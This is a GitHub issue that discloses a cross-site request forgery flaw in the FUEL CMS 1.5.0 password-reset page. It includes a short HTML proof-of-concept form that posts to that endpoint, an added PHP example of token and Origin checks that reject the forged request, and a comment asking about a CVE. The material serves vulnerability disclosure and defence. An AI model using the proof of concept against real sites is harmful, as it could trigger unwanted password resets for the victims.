
FUEL CMS 1.5.0 contains a cross-site request forgery (CSRF) vulnerability #584

Open
bunneyOps opened this issue Aug 10, 2021 · 1 comment


@bunneyOps

Because my mailbox function is not configured, it cannot be fully demonstrated. There is a CSRF vulnerability in the password modification page.

http://website/fuel/index.php/fuel/#/pwd_reset

CSRF PoC:

```html
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.255.130/fuel/index.php/fuel/#/pwd_reset" method="POST">
      <input type="hidden" name="email" value="1231&#64;1&#46;com" />
      <input type="hidden" name="Submit" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```
daylightstudio pushed a commit that referenced this issue Aug 10, 2021
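
A server-side check that would reject the form in the report, as an added example (not FUEL CMS code and not the change in the referenced commit): a per-session synchronizer token combined with an Origin comparison. The function names, the `csrf_token` field, the origins and the sample requests are assumptions constructed for illustration.

```php
<?php
// Added illustration, not FUEL CMS code. Function names, the csrf_token
// field name and the sample requests below are constructed assumptions.

// Issue one random token per session; the reset form embeds it as a hidden field.
function issue_csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a state-changing POST may proceed.
function is_request_trusted(array $server, array $post, array $session, string $siteOrigin): bool {
    // 1. If the browser supplied an Origin header, it must be the site's own.
    if (isset($server['HTTP_ORIGIN']) && $server['HTTP_ORIGIN'] !== $siteOrigin) {
        return false;
    }
    // 2. The token must exist on both sides and match in constant time.
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($supplied) || $expected === '' || $supplied === '') {
        return false;
    }
    return hash_equals($expected, $supplied);
}

// --- constructed sample requests ---
$siteOrigin = 'http://cms.example';   // placeholder origin
$session = [];
$token = issue_csrf_token($session);

// Same fields as the form in the report: no token, foreign Origin.
$forged = [
    'server' => ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'http://other.example'],
    'post'   => ['email' => 'user@example.com', 'Submit' => 'Submit'],
];
// Form rendered by the site itself: token echoed back, matching Origin.
$legit = [
    'server' => ['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => $siteOrigin],
    'post'   => ['email' => 'user@example.com', 'Submit' => 'Submit', 'csrf_token' => $token],
];

foreach (['forged' => $forged, 'legit' => $legit] as $name => $req) {
    $ok = is_request_trusted($req['server'], $req['post'], $session, $siteOrigin);
    echo $name, ': ', $ok ? 'accepted' : 'rejected', PHP_EOL;
}
```

The token check alone is sufficient to reject the forged request; the Origin comparison is a second, independent layer for clients that send the header.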
@BigSkidderHyPhen

Did you get a CVE for this, master?
